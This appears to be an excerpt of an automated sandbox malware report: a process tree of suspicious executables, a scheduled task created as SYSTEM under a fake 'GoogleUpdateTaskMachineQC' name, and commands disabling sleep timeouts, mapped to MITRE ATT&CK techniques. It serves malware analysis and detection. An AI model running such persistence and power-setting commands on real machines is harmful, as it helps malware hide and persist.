C:\Users\Admin\AppData\Local\Temp\3EC4.exe
C:\Users\Admin\AppData\Local\Temp\3EC4.exe
1⤵
PID:6836
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 6836 -s 756
  2⤵
  - Program crash
  PID:9632

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\iacrcjwhmdyc.xml"
1⤵
- Creates scheduled task(s)
PID:7612

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:7524
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-ac 0
  2⤵
  PID:9488
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-dc 0
  2⤵
  PID:10020
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-ac 0
  2⤵
  PID:9084
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-dc 0
  2⤵
  PID:9780

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:9464

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
1⤵
PID:9308

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:9368

C:\Users\Admin\AppData\Roaming\CustomAttributeType\AreAccessRulesProtected.exe
C:\Users\Admin\AppData\Roaming\CustomAttributeType\AreAccessRulesProtected.exe
1⤵
PID:9832

C:\Users\Admin\AppData\Local\Temp\qABqRMnwOGPxNrwvr\ifhEFYQnJPVQZSd\AjISanj.exe
C:\Users\Admin\AppData\Local\Temp\qABqRMnwOGPxNrwvr\ifhEFYQnJPVQZSd\AjISanj.exe c8 /ybsite_idDcF 525403 /S
1⤵
PID:10120

C:\Users\Admin\AppData\Local\Temp\kBxxCRZNHvjAGpesg\GPTqPnNFuTbVPXl\jMXoYrK.exe
C:\Users\Admin\AppData\Local\Temp\kBxxCRZNHvjAGpesg\GPTqPnNFuTbVPXl\jMXoYrK.exe gS /Hpsite_idwNw 385121 /S
1⤵
PID:4368

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
1⤵
PID:7172

C:\ProgramData\presepuesto\LEAJ.exe
C:\ProgramData\presepuesto\LEAJ.exe
1⤵
PID:6744

C:\Users\Admin\AppData\Local\Temp\1CC1.exe
C:\Users\Admin\AppData\Local\Temp\1CC1.exe
1⤵
PID:8576

C:\Users\Admin\AppData\Local\Temp\3607.exe
C:\Users\Admin\AppData\Local\Temp\3607.exe
1⤵
PID:4916

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

Scripting

T1064

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Scripting

T1064

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

System Information Discovery